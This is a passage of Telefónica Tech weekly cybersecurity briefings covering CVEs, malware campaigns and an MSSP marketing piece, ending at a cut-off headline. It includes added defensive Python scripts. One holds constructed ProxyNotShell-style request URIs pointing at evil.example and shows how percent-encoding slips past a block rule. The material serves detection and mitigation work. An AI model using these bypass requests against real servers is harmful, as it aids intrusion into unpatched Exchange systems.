Campaigns spreading ERMAC malware
A team of Cyble researchers recently discovered a mass phishing campaign aimed at spreading the ERMAC banking trojan. The infection method is based on downloading fake apps that impersonate Google Wallet, PayPal, Snapchat and others. These fake apps are downloaded from fake domains hosting websites that impersonate some of the most popular Android app stores, and the fake domains also impersonate the companies allegedly distributing the apps. Once a fake app is executed, ERMAC proceeds to steal data such as contacts and SMS messages, as well as the list of apps installed on the device. The latter is used to display phishing pages on the victim's screen, and the collected data is sent to the malware's command and control server via POST requests.
More info →
* * *
Apple fixes 0-day vulnerability for iOS and iPadOS in latest patch
The latest update released by Apple fixes, among others, a 0-day vulnerability that may have been actively exploited against iPhone and iPad devices. The vulnerability, identified as CVE-2022-42827 and still pending a CVSS score from Apple, would allow an attacker to execute arbitrary code in the kernel with the highest privileges, which could lead to data corruption, performance disruption or unauthorised code execution on the device. The update that fixes this vulnerability is available for iPhone 8 and later, all iPad Pro models, iPad Air third generation and later, and iPad and iPad mini fifth generation and later.
More info →
* * *
VMware fixes critical vulnerability in Cloud Foundation
VMware has issued an advisory on two vulnerabilities affecting its Cloud Foundation hybrid platform, including a critical one. The first, identified as CVE-2021-39144 with a CVSS score of 8.5 (9.8 according to VMware), is a remote code execution vulnerability through the XStream library.
The second, identified as CVE-2022-31678 with a CVSS score of 5.3 assigned by VMware, could allow an attacker to cause a denial of service or expose information. Both vulnerabilities affect VMware Cloud Foundation (NSX-V) version 3.11 and are fixed in the latest update.
More info →
* * *
Critical vulnerability in OpenSSL announced
The OpenSSL Project team has announced that it will release a new version of OpenSSL, 3.0.7, on 1 November, including a security fix classified as critical. No details of the vulnerability have been released beyond the fact that it does not affect versions prior to 3.0, but its mere existence has caused concern, as it is the first critical vulnerability announced by OpenSSL since 2016. Although the developers have announced the new version and the bug in advance so that users have time to take inventories and prepare their systems, OpenSSL does not believe this will be enough for attackers to discover the vulnerability, as Mark J. Cox, a member of the team, has stated.
More info →
* * *
Zoom vulnerability could expose users to phishing attacks
Zoom has issued a security bulletin fixing a URL parsing vulnerability. Listed as CVE-2022-28763 with a CVSS of 8.8, the flaw could be exploited by a malicious actor using a specially crafted Zoom meeting URL to redirect a user to an arbitrary network address, enabling further attacks, including taking control of the active session. The affected products include Zoom Client for Meetings (for Android, iOS, Linux, macOS and Windows), Zoom VDI Windows Meeting Clients and Zoom Rooms for Conference Room (for Android, iOS, Linux, macOS and Windows), all in versions prior to 5.12.2. Zoom recommends updating to or downloading the latest software.
More info →
* * *
Drinik: Android banking trojan re-emerges with advanced capabilities
Analysts at Cyble have detected a new version of the Drinik banking malware, which targets Android systems and is currently aimed at 18 banking institutions in India. According to Cyble's report, the trojan poses as the country's official tax administration app (iAssist) to steal victims' personal information and banking credentials. Once installed on the victim's device, the application requests permissions to write to external storage, receive, read and send SMS, and read the call log. It also requests access to Android's accessibility service, which it uses to disable Google Play Protect and to perform navigation gestures, record the screen and capture keystrokes and user credentials while displaying the legitimate Indian income tax site inside the app. As its end goal, Drinik redirects victims to an Income Tax Department phishing website where, under the guise of a refund in their favour, it asks the user for financial information, including account number, credit card number, CVV and PIN. Drinik has been known since 2016 and has evolved continuously, improving its capabilities and targeting mass audiences, in this case Indian taxpayers and bank customers.
More info →
October 28, 2022
Cyber Security
Cyber Security Weekly Briefing, 15-21 October
The NoName057(16) group attacks the Spanish Ministry of Defense
Last Friday, the threat actor NoName057(16) carried out an attack against the website of the Spanish Ministry of Defense, rendering it unavailable for a short period of time. NoName057(16) is a politically motivated group that tends to carry out denial-of-service attacks against its victims, usually institutions and companies from EU or NATO countries, especially in the public, transport and telecommunications sectors. The group has been carrying out this type of attack since March 2022, when its Telegram channel was created, but has increased its activity since last summer. Additionally, the group has recently claimed that it is not to be confused with the Killnet hacktivist group, which has a similar profile and modus operandi.
More info →
* * *
Microsoft reports a misconfigured endpoint of its own
The Microsoft Security Response Center has reported the remediation of a misconfigured endpoint that could have resulted in unauthorised access to data stored on it. The information that could have been exposed involved business transactions between Microsoft and customers, including sensitive data such as personal names, email addresses, email content, company names, phone numbers and document attachments. Microsoft became aware of the misconfigured endpoint on 24 September thanks to a tip-off from SOCRadar, and then proceeded to address the risk. According to the information published by Microsoft, there is no indication that customer accounts or systems have been compromised, and all affected customers have been notified directly.
More info →
* * *
Critical vulnerability in Apache Commons Text
A critical vulnerability in Apache Commons Text has recently been disclosed. It would allow an unauthenticated attacker to remotely execute code (RCE) on servers running applications that include the affected component.
Identified with CVE-2022-42889 and a CVSS of 9.8, the flaw affects Apache Commons Text versions 1.5 to 1.9 and is located in insecure defaults at the time Apache Commons Text performs variable interpolation, which could lead to arbitrary code execution on remote servers. According to the Apache Foundation itself, the Apache Commons Text library is reportedly present in more than 2,500 projects and recommends upgrading as soon as possible to Apache Commons Text 1.10.0, which disables interpolators that present problems by default. On the other hand, several security researchers have pointed out the public availability of a proof of concept (PoC) for this vulnerability, a fact that considerably increases the risk. Other sources have even compared this bug to the well-known Log4j vulnerability, although it seems likely that its impact is less widespread and for the time being there are no reports of its possible active exploitation on the network. More info → * * * BlackLotus: highly sophisticated malware for sale in underground forums Security researchers have reportedly detected a threat actor selling a tool called BlackLotus on underground forums, with capabilities that have so far only been observed in state-sponsored groups and actors. This tool, a type of UEFI bookit, would be installed in the computer's firmware and would evade detection by security solutions by loading itself early in the device's boot sequence. According to the author of the tool in his publication, BlackLotus is said to have features to detect activity in virtual machines and has protections against removal, thus making malware analysis more difficult. Finally, security researcher Scheferman says that until a sample of the malware has been fully analysed, it cannot be ruled out that BlackLotus could be used to carry out a Bring Your Own Driver (BYOVD) attack. 
More info → * * * PoC available for critical Fortinet vulnerability Over the past few days, a proof-of-concept (PoC) has been published on GitHub that exploits the critical security flaw affecting Fortinet FortiOS, FortiProxy and FortiSwitchManager products that was reported over the past week under the coding CVE-2022-40684. Specifically, exploitation of this vulnerability could allow a remote attacker to perform an authentication bypass, deriving their actions in performing malicious operations on the administrative interface via HTTP(S) requests. In addition, according to Horizon3.ai, following an analysis of the PoC, they indicate that FortiOS would expose a management web portal, allowing the user to condiv the system. It is worth noting that when the PoC was published in open source, Fortinet had already reported active exploitation of the vulnerability. However, on Friday it issued an advisory that included mitigation guidance, as well as updates and fixes for customers. Finally, it is worth noting that researchers from GreyNoise and Wordfence have published detection of exploitation attempts. More info →
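Practitioners reading the Fortinet item above will want a way to check their own devices for the exploitation indicator Fortinet published for CVE-2022-40684: administrator logins recorded under the user name Local_Process_Access. The following Python script is an added illustration, not code from the briefing or from Fortinet. It parses FortiOS-style key=value syslog lines and flags such logins. The three log lines are constructed for the example: the field names follow the FortiOS event-log format, but the log IDs, timestamps and addresses are invented.

```python
"""Flag FortiOS admin-login events that carry the CVE-2022-40684 indicator.

Added example, not code from the briefing or from Fortinet. Fortinet's advisory
tells customers to search device logs for user="Local_Process_Access"; the
sample lines below are constructed to look like FortiOS key=value syslog output.
"""
import re
from typing import Dict, List

# One key=value pair; values are either double-quoted (may contain spaces) or bare.
_KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_kv(line: str) -> Dict[str, str]:
    """Parse a FortiOS-style key=value log line into a dict, stripping quotes."""
    fields = {}
    for key, raw in _KV_RE.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    return fields


def is_suspicious_login(event: Dict[str, str]) -> bool:
    """True for a system login event under the advisory's indicator user name."""
    return (
        event.get("type") == "event"
        and event.get("subtype") == "system"
        and event.get("action") == "login"
        and event.get("user") == "Local_Process_Access"
    )


def find_suspicious_logins(lines: List[str]) -> List[Dict[str, str]]:
    """Return the parsed events that match, each annotated with its raw line."""
    hits = []
    for line in lines:
        event = parse_kv(line)
        if is_suspicious_login(event):
            event["_line"] = line
            hits.append(event)
    return hits


# Constructed sample lines: a normal admin login, a login matching the
# indicator, and a logout. Values are invented for the example.
SAMPLE_LOGS = [
    'date=2022-10-13 time=09:12:01 logid="0100032001" type="event" subtype="system" '
    'level="information" vd="root" user="admin" ui="https(203.0.113.5)" '
    'method="https" srcip=203.0.113.5 action="login" status="success" '
    'msg="Administrator admin logged in successfully from https(203.0.113.5)"',
    'date=2022-10-13 time=09:12:44 logid="0100032001" type="event" subtype="system" '
    'level="information" vd="root" user="Local_Process_Access" ui="jsconsole" '
    'method="jsconsole" srcip=198.51.100.77 action="login" status="success" '
    'msg="Administrator Local_Process_Access logged in successfully from jsconsole"',
    'date=2022-10-13 time=09:13:02 logid="0100032003" type="event" subtype="system" '
    'level="notice" vd="root" user="admin" ui="https(203.0.113.5)" action="logout" '
    'status="success" msg="Administrator admin logged out from https(203.0.113.5)"',
]

if __name__ == "__main__":
    for hit in find_suspicious_logins(SAMPLE_LOGS):
        print(f'{hit["date"]} {hit["time"]} srcip={hit.get("srcip")} user={hit["user"]}')
```

Run it against exported device logs by replacing SAMPLE_LOGS with the lines of the file; a hit means the device should be treated as compromised and its configuration and administrator accounts reviewed, regardless of whether it has since been patched.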
October 21, 2022
Cyber Security
Selecting a managed security service provider (MSSP): 5 key factors to keep in mind
A Managed Security Service Provider (MSSP) gives you a team of seasoned security experts that works for you at a fraction of the cost of building a security team in-house. These providers used to serve only large enterprises, but many MSSPs now also offer their services to small and medium-sized businesses.

According to Gartner research, in 2021 the Managed Security Services (MSS) market grew 9.8% in U.S. dollars, reaching $13.9 billion in revenue. The managed detection and response (MDR) segment saw strong growth of 48.9% in U.S. dollars. By 2024, more than 90% of buyers looking to outsource security services will focus on threat detection and response.

Not every business has the workforce to find and resolve vulnerabilities and threats, and selecting a qualified, good-fit MSSP is a challenge. To help you choose a managed security service provider, here are five things you should consider:

1. Managed security services rankings

Managed security service providers offer diverse interpretations of what managed security is, making it difficult to compare directly what providers deliver. Security and risk management leaders should identify the fundamental deliverables and align their requirements to the offerings. To facilitate comparison between MSSPs, there are specialized rankings such as the one published by MSSP Alert: Top 250 MSSPs, 2022 Edition. The rankings are based on:

- Annual recurring revenues
- Profitability
- Business growth rate
- Cyber professional headcount
- Managed security services offered
- MSSP Alert's editorial coverage of MSSPs worldwide
- Third-party industry honors (e.g. Gartner, Forrester, IDC)

Telefónica Tech USA ranked 5th in the Top 250 Global MSSPs list for 2022 published by MSSP Alert, a CyberRisk Alliance resource that identifies the main providers of managed security services worldwide. The curated list identifies and honors the top MSSPs worldwide and helps enterprises evaluate and choose the MSSP that best fits their needs.

2. Simplify today's complex cyber ecosystem

As the security provider landscape has become a vast field with many actors, enterprises want to reduce the time spent on integrations, vendor selection and qualification, and so simplify decision-making. Having access to the best technologies and partners (and thus delegating updates, patches, bug fixing, etc.) is key to success.

3. Peace of mind from trusting an experienced partner

Finding an MSSP partner with the right expertise for your business can help you identify your vulnerabilities and mitigate them quickly. Telefónica Tech is a Managed Security Services Provider (MSSP) with a heritage in managed services across data center, workplace, communications and cloud. As such, we have deep subject-matter expertise across the entire threat landscape and operate security as a core discipline, from advisory services through to managed security engineering and operations.

4. Proprietary threat intelligence, advanced technology and standardized procedures

A managed security service provider (MSSP) provides outsourced monitoring and management of security devices and systems. Common services include managed firewall, intrusion detection, virtual private network, vulnerability scanning and anti-virus services. Hundreds of MSSPs now offer MDR services; however, Gartner warns customers to be careful about pretenders in the market with incomplete offerings. Telefónica Tech's NextDefense managed service integrates Managed Detection and Response (MDR), Vulnerability Risk Management (VRM) and Cyber Threat Intelligence (CTI) with Digital Risk Protection (DRP) into a single solution that defends your cloud, corporate network, remote employees, digital assets, brand and reputation.

5. Cost control of your security operations and technologies

When deciding which MSSP to use, your top priority should be to find one that is both budget-friendly and provides value for money. Great MSSPs provide customizable pricing with tailored solutions specific to your business needs. Picking and choosing specific services helps keep your budget contained and avoids paying for unnecessary products. Selecting an MSSP such as Telefónica Tech provides the technology, the experts and the processes at a fixed, predictable monthly cost and SLA, with no CAPEX investment needed.

🔵 Interested in talking to an expert? Contact our team.
October 18, 2022
Cyber Security
Cyber Security Weekly Briefing, 7 — 14 October
Critical vulnerability in Fortinet

Fortinet has issued a security advisory urging its customers to update their FortiGate firewalls and FortiProxy web proxies in order to fix a critical authentication bypass vulnerability that could allow remote attackers to log into unpatched devices. The vulnerability has been identified as CVE-2022-40684. The vendor has not yet assigned it a CVSS score, although some researchers estimate that it could reach 9.8. The flaw resides in the administrative interface where, using an alternate path or channel in FortiOS and FortiProxy, an unauthenticated attacker can perform operations via specially crafted HTTP or HTTPS requests. The vulnerable versions are FortiOS 7.0.0 to 7.0.6 and 7.2.0 to 7.2.1, and FortiProxy 7.0.0 to 7.0.6 and 7.2.0; the vulnerability is fixed in FortiOS 7.0.7 and 7.2.2 and in FortiProxy 7.0.7 and 7.2.1. Where these updates cannot be applied, Fortinet recommends limiting the IP addresses that can reach the administrative interface through a local-in policy, or even disabling the remote administration interfaces altogether, so that potential attacks are blocked until the update can be installed. There are no reports of active exploitation of this flaw by threat actors so far, although according to the Shodan search engine more than 100,000 FortiGate firewalls are reachable from the Internet. More info →

* * *

LofyGang focuses on supply chain attacks

Researchers at Checkmarx have published a report on a threat actor focused on supply chain attacks, known as LofyGang. According to Checkmarx, the group's latest campaign, ongoing since 2021, infects open-source software supply chains with malicious NPM packages. The attackers' objectives are to obtain credit card information and to steal user accounts, including premium accounts for Discord and for services such as Disney+ or Minecraft, among others. To carry out the attacks they use a range of TTPs, including typosquatting (publishing packages whose names are a typo away from popular ones) and "StarJacking" (linking the malicious package to the GitHub repository of an unrelated, popular project to borrow its stars and reputation). The group, believed to be Brazilian, communicates mainly via Discord. It also has a YouTube channel and contributes to several underground forums under the nickname DyPolarLofy, promoting its tools and selling the credentials it has obtained. The group also has a GitHub account where it offers open-source repositories with tools and bots for Discord. It is worth noting that the Checkmarx researchers have created a website to track updates on their findings and a repository of the malicious packages discovered so far. More info →

* * *

Emotet resurfaces with new evasion mechanisms

Researchers at VMware's Threat Analysis Unit have published a report analysing the resurgence of the group behind the Emotet malware-as-a-service (MaaS), known as Mummy Spider, MealyBug or TA542. This resurgence follows the takedown of the botnet by international law enforcement in January 2021. The researchers analysed data from spam emails, URLs and attachments collected from campaigns earlier this year, concluding that the Emotet botnets are constantly evolving to make detection and blocking by defence teams more difficult: they hide their configurations, build more complex execution chains and constantly modify their command and control (C2) infrastructure. They have also expanded and improved their credit card theft capabilities and their lateral propagation mechanism. The malware is distributed through mass mailings of emails with malicious links or attachments. More info →

* * *

Microsoft fixes 84 vulnerabilities in its Patch Tuesday, including two 0-days

Microsoft has fixed 84 vulnerabilities in its October Patch Tuesday, including two 0-days, one of them actively exploited, and 13 critical flaws that would allow privilege escalation, spoofing or remote code execution. The actively exploited 0-day, identified as CVE-2022-41033 with CVSS 7.8, was reported by an anonymous researcher and affects the Windows COM+ Event System service, allowing an attacker to gain SYSTEM privileges. The second 0-day, which according to Microsoft has only been publicly disclosed and not exploited, is catalogued as CVE-2022-41043 with a temporal CVSS of 2.9; it is an information disclosure vulnerability in Microsoft Office that could allow an attacker to gain access to user authentication tokens. Regarding the two other recently disclosed 0-days in Exchange Server (CVE-2022-41040 and CVE-2022-41082), Microsoft clarifies that it has not yet released security updates to address them and refers to its 30 September guidance on how to apply mitigations for these vulnerabilities. More info →

* * *

Alchimist: new attack framework targeting Windows, Linux and macOS

Cisco Talos researchers have discovered a new attack framework with command and control (C2) capabilities, designed to target Windows, Linux and macOS systems. Named "Alchimist", its components are all 64-bit executables written in Go, which eases porting across operating systems. It operates through a web interface that lets the operator generate and configure the payloads deployed on infected devices, which can take screenshots, run arbitrary commands and execute code remotely. In addition, Alchimist delivers a new remote access Trojan (RAT) called "Insekt", via PowerShell code on Windows and wget on Linux and, in the case of macOS, instead by a binary embedding a privilege escalation exploit for CVE-2021-4034 in Polkit's pkexec utility. Once deployed, the Trojan establishes communication with the attackers' C2 infrastructure through the Alchimist interface over protocols such as TLS, SNI and WSS/WS, its main purposes being information gathering and command execution. More info →
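Two of the LofyGang techniques described in this briefing, typosquatting and StarJacking, can be screened for mechanically before a package is allowed into a build. The following Python is an added example, not part of the briefing or of Checkmarx's tooling. It applies two heuristics to a package's metadata: an edit-distance check of the package name against a list of popular names, and a comparison of the package name with the GitHub repository it claims as its source. The popular-package list and the metadata records are constructed for the example; a real check would pull the top-N names from the registry and read `name` and `repository` from each package's package.json.

```python
"""Heuristics for typosquatting and StarJacking in NPM package metadata.

Added example, not code from the briefing or from Checkmarx. POPULAR_PACKAGES
stands in for a registry's most-downloaded names and SAMPLES are constructed
metadata records in the shape of package.json's 'name' and 'repository'.
"""
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Constructed stand-in for "the most-downloaded packages on the registry".
POPULAR_PACKAGES = ["lodash", "express", "discord.js", "colors", "chalk", "request"]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance that also counts an adjacent transposition
    (the classic 'swapped two letters' typo) as a single edit."""
    prev2: Optional[List[int]] = None
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            best = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if prev2 is not None and i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                best = min(best, prev2[j - 2] + 1)
            cur.append(best)
        prev2, prev = prev, cur
    return prev[-1]


def typosquat_candidate(name: str, popular: List[str], max_dist: int = 1) -> Optional[str]:
    """Return the popular package that `name` most likely imitates, if any.
    An exact match is the genuine package, not a squat."""
    if name in popular:
        return None
    dist, match = min((edit_distance(name, p), p) for p in popular)
    return match if dist <= max_dist else None


def starjacking_candidate(name: str, repository: Optional[str]) -> bool:
    """True when the declared GitHub repository name does not resemble the
    package name, e.g. a package 'discord-selfbot-tools' whose metadata points
    at github.com/axios/axios to inherit that project's stars."""
    if not repository:
        return False
    parsed = urlparse(repository)
    parts = parsed.path.strip("/").split("/")
    if parsed.hostname != "github.com" or len(parts) < 2:
        return False
    repo = parts[1].removesuffix(".git").removesuffix(".js")
    bare = name.split("/")[-1].removesuffix(".js")  # drop an npm scope, keep the name
    return edit_distance(bare.lower(), repo.lower()) > 2


def assess(meta: Dict[str, Optional[str]]) -> List[str]:
    """Run both heuristics on one metadata record and return the findings."""
    findings = []
    name = meta["name"]
    imitated = typosquat_candidate(name, POPULAR_PACKAGES)
    if imitated:
        findings.append(f"typosquat: {name!r} is one edit away from {imitated!r}")
    if starjacking_candidate(name, meta.get("repository")):
        findings.append(f"starjacking: {name!r} claims repository {meta['repository']}")
    return findings


# Constructed metadata records for the example.
SAMPLES = [
    {"name": "lodash", "repository": "https://github.com/lodash/lodash"},
    {"name": "lodahs", "repository": "https://github.com/lodash/lodash"},
    {"name": "discord-selfbot-tools", "repository": "https://github.com/axios/axios"},
    {"name": "chalk", "repository": "https://github.com/chalk/chalk"},
]

if __name__ == "__main__":
    for meta in SAMPLES:
        for finding in assess(meta) or ["ok"]:
            print(f'{meta["name"]}: {finding}')
```

Both checks are heuristics: a legitimate fork can reasonably point at an upstream repository with a different name, and a short package name is always close to something. Use them to queue packages for review rather than to block outright.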
October 17, 2022
Cyber Security
Cyber Security Weekly Briefing, 1 — 7 October
Lazarus targets Dell via new FudModule rootkit

ESET researchers have reported a new Lazarus campaign that abuses a Dell hardware driver through a new rootkit called FudModule. The rootkit uses the technique known as bring your own vulnerable driver (BYOVD), in which malicious actors load legitimate, signed drivers with known vulnerabilities into Windows and exploit them to gain kernel privileges; this is the first time the vulnerability in this Dell driver has been seen exploited in the wild. The campaign, aimed at espionage and data theft, was conducted via spear-phishing from autumn 2021 and affected targets in the Netherlands and Belgium. The malicious emails posed as job offers and deployed malware loaders (droppers) and customised backdoors. The most notable tool was a user-mode module that gained the ability to read and write kernel memory through vulnerability CVE-2021-21551, which affected the legitimate Dell driver dbutil_2_3.sys and had remained exploitable for 12 years until the manufacturer issued security updates to fix it. More info ⇾

* * *

Evolution of the Bumblebee malware

Check Point researchers have published a study highlighting the constant evolution of this malware, discovered earlier this year. Check Point outlines several features that confirm the constant changes in Bumblebee. These include the delivery vector: most commonly a malicious DLL packed inside an ISO file, which was changed for a time to a VHD file and has since reverted to ISO delivery via malspam campaigns. The researchers also note the addition of checks for sandbox environments to hinder malware analysis. It is also estimated that, until last July, Bumblebee's command and control (C2) servers accepted only one infected victim per IP address, i.e. if several computers in an organisation reaching the Internet through the same public IP were infected, the C2 server accepted only one of them; now they can communicate with multiple infected systems on the same network. Finally, the researchers indicate that it is very likely that, depending on the network characteristics of the infected system, in later stages Bumblebee will deploy stealers or more complex post-exploitation tools such as Cobalt Strike. More info ⇾

* * *

Critical vulnerability in the PHP package repository Packagist

The Sonar team has published the discovery of a new critical vulnerability affecting Packagist, the official package repository used by Composer, the world's largest PHP package manager. The security flaw, listed as CVE-2022-24828 with a CVSS of 8.8, allows arbitrary commands to be executed on the server running the Packagist instance. An attacker could exploit this vulnerability to modify the information of existing PHP packages, even changing the download path of the packages: a supply chain attack, one of the most effective techniques available to an attacker. According to the researchers, of the two billion component downloads performed with Composer per month, approximately 100 million depend on the metadata provided by Packagist. The vulnerability was fixed immediately in Composer versions 1.10.26, 2.2.12 and 2.3.5. More info ⇾

* * *

ProxyNotShell: bugs and fixes for Exchange vulnerabilities

Microsoft has published guidance about the vulnerabilities in Microsoft Exchange Server classified as CVE-2022-41040 and CVE-2022-41082, although no patches have yet been released to fix these flaws. Pending such patches, Microsoft published a script to apply mitigations based on URL rewriting that, as some researchers showed, could be bypassed. In response, Microsoft corrected these temporary mitigations, but they were called into question again after researcher Pieter Hiele demonstrated that the string filtering applied to the request URI did not take character encoding into account (a percent-encoded character defeats a rule that looks only for its literal form), which rendered Microsoft's measures ineffective. This was confirmed by other researchers and led Microsoft to correct its mitigations once more. In addition, researcher Kevin Beaumont pointed out that Microsoft's guidance focuses on protecting on-premises servers, leaving out hybrid configurations. Meanwhile, scanning for systems vulnerable to the flaws, known as ProxyNotShell, has been detected from IPs identified as malicious. Finally, the first attempts to sell exploits for the vulnerabilities via GitHub have been recorded; these "exploits" are turning out to be fake, scams demanding large sums in cryptocurrency without delivering any code that exploits ProxyNotShell. More info ⇾

* * *

Newly published vulnerability in macOS

Apple device management firm Jamf has published details of research by Ferdous Saljooki on a vulnerability affecting macOS. The flaw lies in the Archive Utility and could allow unauthorised, unsigned malicious applications to run while bypassing the protections and warnings that Apple normally applies. The cause is that Archive Utility did not apply Apple's quarantine attribute to the extracted files when unzipping an archive with two or more files or folders at its root. The quarantine attribute is normally set by the system on downloaded files so that untrusted software, or software whose developer cannot be verified, is checked and the user has to authorise it explicitly before it runs; without the attribute, attackers could run malicious software without that check. The vulnerability has been given the identifier CVE-2022-32910 and, although Apple patched it in its May and July updates, it has only become known in the last few days. More info ⇾
October 7, 2022
Cyber Security
Cyber Security Weekly Briefing, 24 — 30 September
Two 0-day vulnerabilities exploited in Microsoft Exchange

The Vietnamese cybersecurity team GTSC reported two 0-day vulnerabilities in Microsoft Exchange three weeks ago through the Zero Day Initiative (ZDI); they are reportedly being actively exploited by threat actors. Chaining the two flaws allows an attacker to execute code remotely (RCE) on compromised systems. Registered as CVE-2022-41040 and CVE-2022-41082, the first vulnerability is a server-side request forgery (SSRF) that allows an authenticated attacker to reach and trigger the second, which provides the remote code execution. According to the researchers, active campaigns have been detected using the pair of 0-days to deploy the popular China Chopper web shell on vulnerable servers. Once the system is compromised and persistence is achieved, the attackers collect information and move laterally to other systems in their victims' networks. Microsoft currently recommends a temporary mitigation that blocks attack attempts by adding a new rule in IIS via the URL Rewrite module. More info ⇾

* * *

Critical vulnerability in Sophos Firewall actively exploited

Sophos has reported the discovery of a critical vulnerability affecting the Sophos Firewall User Portal and Webadmin that would allow an attacker to perform remote code execution (RCE). The security flaw, listed as CVE-2022-3236 with a CVSS of 9.8, is reportedly being used in campaigns primarily affecting organisations in the South Asia region, which the company has already reported. Sophos has released hotfixes to address the vulnerability, which affects Sophos Firewall v19.0 MR1 (19.0.1) and earlier. Sophos Firewall applies these hotfixes by default without any action from customers; users who have disabled this default setting will need to apply them manually. If this is not possible, the company advises disabling WAN access to the User Portal and Webadmin. More info ⇾

* * *

Chaos: versatile Go-based malware

Researchers at Black Lotus Labs have released information about the Chaos malware, a new multi-functional Go-based botnet that has expanded rapidly in recent months. First detected in April, Chaos is built for Windows and Linux devices across multiple architectures, and can perform DDoS attacks, mine cryptocurrency, establish persistence and propagate automatically, either by brute-forcing SSH logins or by using stolen SSH keys. The malware has been attributed to a Chinese threat actor, given the Chinese language used in it and its China-based command and control (C2) infrastructure. Although the victims of its attacks tend to be European, the bots are also being distributed across devices in the Americas and Asia, targeting a wide range of industries as well as devices and systems less closely linked to business environments, such as SOHO routers or the FreeBSD operating system. More info ⇾

* * *

New malware on VMware ESXi with backdoor capabilities

The Mandiant research team has discovered a new malware family targeting VMware systems and aimed at installing multiple persistent backdoors on ESXi hypervisors. Mandiant links its discovery to the threat actor tracked as UNC3886, which appears to focus on developing and deploying malware on systems that do not normally support EDR. The malware currently targets VMware ESXi, Linux vCenter servers and Windows virtual machines, and allows transferring files between hypervisors and guest machines, tampering with logging services on the hypervisor and executing arbitrary commands from one virtual machine to another. It also gains persistence with administrator privileges on infected systems by installing backdoors, named VirtualPita and VirtualPie by the researchers, via malicious vSphere Installation Bundles (VIBs). More info ⇾

* * *

WhatsApp fixes critical 0-day vulnerabilities

Over the last few days it has come to light that WhatsApp has fixed two vulnerabilities affecting its Android and iOS versions that have received CVSS ratings of up to 9.8, making them critical. Both flaws, CVE-2022-36934 and CVE-2022-27492, would allow attackers to execute arbitrary code remotely. The first is an integer overflow that allows code execution via a video call without any user interaction, by exploiting bugs in the Video Call Handler component, and is present in WhatsApp versions prior to v2.22.16.12. The second is an integer underflow that, by contrast, does require user interaction: the attacker sends a manipulated video file via WhatsApp which, when handled by the Video Call Handler components, causes additional memory corruption. The versions affected by this second vulnerability are those prior to v2.22.16.2 on Android and v2.22.15.9 on iOS. There are currently no known attempts to exploit either flaw. More info ⇾
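The URL Rewrite mitigation recommended in the Exchange item above, and the encoding bypass of that same mitigation covered in the 1-7 October briefing higher up this page, come down to one detail: whether the rule matches the request URI before or after percent-decoding. The Python below is an added example, not code from the briefing or from Microsoft. It models the two rule variants as regular expressions applied the way an IIS URL Rewrite "abort request" rule applies them. The first is the shape of Microsoft's initial pattern, `.*autodiscover\.json.*\@.*Powershell.*`, which requires a literal `@` and is matched case-insensitively as IIS rewrite rules are by default; the second percent-decodes the URI first, as IIS's `{UrlDecode:...}` function does in the revised guidance, and uses an order-independent pattern with no dependency on `@`. The request URIs are constructed test inputs, not captured traffic.

```python
"""Why a URL-rewrite block rule must match on the *decoded* request URI.

Added example, not code from the briefing or from Microsoft. It replays the
logic of an IIS URL Rewrite 'abort request' rule in Python: the request URI is
tested against a regular expression and matching requests are dropped.
"""
import re
from typing import Dict, Iterable, Tuple
from urllib.parse import unquote

# Shape of the first published mitigation: a literal '@' is required.
# IIS rewrite rules ignore case by default, hence re.IGNORECASE here too.
NAIVE_PATTERN = re.compile(r".*autodiscover\.json.*\@.*Powershell.*", re.IGNORECASE)

# Hardened check: order-independent, case-insensitive, no dependency on '@'.
HARDENED_PATTERN = re.compile(r"(?=.*autodiscover\.json)(?=.*powershell)", re.IGNORECASE)


def blocked_naive(request_uri: str) -> bool:
    """Initial rule: regex applied to the raw, still percent-encoded, URI."""
    return NAIVE_PATTERN.match(request_uri) is not None


def blocked_hardened(request_uri: str) -> bool:
    """Revised rule: percent-decode first (the {UrlDecode:...} step), then
    apply a pattern that does not rely on any particular character surviving."""
    decoded = unquote(request_uri)
    return HARDENED_PATTERN.match(decoded) is not None


def evaluate(request_uris: Iterable[str]) -> Dict[str, Tuple[bool, bool]]:
    """Return {uri: (naive_blocks, hardened_blocks)} for a batch of requests."""
    return {u: (blocked_naive(u), blocked_hardened(u)) for u in request_uris}


# Constructed request URIs in the shape the ProxyNotShell chain uses.
REQUESTS = [
    # 1. exactly what the first rule was written for
    "/autodiscover/autodiscover.json?a@evil.example/powershell/?X-Rps-CAT=x",
    # 2. same request with '@' percent-encoded: evades the naive rule
    "/autodiscover/autodiscover.json?a%40evil.example/powershell/?X-Rps-CAT=x",
    # 3. encoding applied to a letter of 'powershell' as well
    "/autodiscover/autodiscover.json?a%40evil.example/%70owershell/?X-Rps-CAT=x",
    # 4. ordinary Autodiscover traffic that must keep working
    "/autodiscover/autodiscover.json?Email=user@corp.example&Protocol=ActiveSync",
]

if __name__ == "__main__":
    for uri, (naive, hardened) in evaluate(REQUESTS).items():
        print(f"naive={naive!s:5} hardened={hardened!s:5} {uri}")
```

The general lesson applies to any request-filtering mitigation, not just this one: canonicalise the input (decode, lower-case, collapse path segments) to the form the backend will actually see, and only then match; a filter that inspects the wire form is bypassed by whichever encoding the backend accepts and the filter does not.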
September 30, 2022
Cyber Security
Cyber Security Weekly Briefing, 17 — 23 September
Quantum and BlackCat ransomware use Emotet as entry vector

Researchers at AdvIntel have published the results of an investigation reporting that the Quantum and BlackCat ransomware operators have adopted Emotet as a dropper among their TTPs. Emotet emerged in 2014 as a banking trojan, but its evolution eventually turned it into a botnet that the Conti ransomware operators used in their operations until June 2022, when Conti disbanded. The methodology now adopted by Quantum and BlackCat is to use Emotet to install a Cobalt Strike beacon, which deploys a payload that allows them to take control of networks and execute ransomware operations. According to the experts, Emotet has increased its activity since the beginning of the year by distributing itself via .lnk files, and it is estimated that more than 1.2 million computers are infected. This increase has also been corroborated by other research teams such as ESET and Agari. More info ⇾

* * *

Revolut suffers data breach with more than 50,000 users exposed

